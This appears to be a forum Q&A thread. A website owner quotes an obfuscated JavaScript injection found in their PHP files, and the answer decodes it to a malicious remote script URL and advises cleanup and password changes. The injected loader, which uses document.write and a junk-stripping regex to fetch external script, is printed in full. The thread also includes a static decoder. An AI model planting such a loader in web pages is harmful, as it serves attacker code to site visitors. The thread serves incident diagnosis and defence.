I found the following code in PHP files on my website. I think someone was able to hack my FTP, or in some other way was able to add this script to my PHP files; I don't know how.
<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->
But I want to know the meaning of the above code. I suppose it is encrypted in HTML format or in some other form, but what is the above code actually doing, and how was someone able to inject it into my website?
Thanks.
The above script src results in the address

http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

It got into your files either via a security hole in your web site / scripts or directly via ftp.
Make sure to clean your files from this malicious code as soon as possible, change your ftp passwords and fix your security flaws!
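The decoding described in the answer can be done statically, without ever running the injected script. The following is an added example, not part of the original answer: the function names are hypothetical, and the sample file content is constructed, using the same junk-character scheme with a placeholder host.

```javascript
// Finds every  '<literal>'.replace(/<pattern>/<flags>, '')  call in a file's text
// and applies the replace offline, so the hidden script URL is recovered
// without executing any of the injected code.
const OBFUSCATED_CALL =
  /'((?:[^'\\]|\\.)*)'\s*\.replace\(\s*\/((?:[^\/\\]|\\.)+)\/([a-z]*)\s*,\s*(?:''|"")\s*\)/g;

function decodeInjectedSources(fileText) {
  const findings = [];
  for (const match of fileText.matchAll(OBFUSCATED_CALL)) {
    const [, literal, pattern, flags] = match;
    let stripper;
    try {
      // Reuse the attacker's own junk-stripping regex; force the global flag.
      stripper = new RegExp(pattern, flags.includes('g') ? flags : flags + 'g');
    } catch (err) {
      continue; // not a regex we can rebuild, skip this candidate
    }
    const decoded = literal.replace(stripper, '');
    const finding = { decoded, host: null, port: null };
    try {
      // Host and port are what you search for in proxy and DNS logs.
      const target = new URL(decoded);
      finding.host = target.hostname;
      finding.port = target.port;
    } catch (err) {
      // Decoded text is not an absolute URL; keep it for manual review.
    }
    findings.push(finding);
  }
  return findings;
}

// Constructed sample: a PHP file with an injected block in the same style as
// the one in the question, pointing at a placeholder host.
const SAMPLE_PHP = String.raw`<?php echo "ok"; ?>
<script>/*Exception*/ document.write('<script src='+'h&t(t)p$:#/^/@b!a&d(.)e$x#a^m@p!l&e(.)i$n#v^a@l!i&d(:)8$0#8^0@/!g&o(o)g$l#e^.@c!o&m(/)'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>`;

console.log(decodeInjectedSources(SAMPLE_PHP));
```

Running the same function over each PHP file on the site lists which files still carry an injected block and which host each one points to.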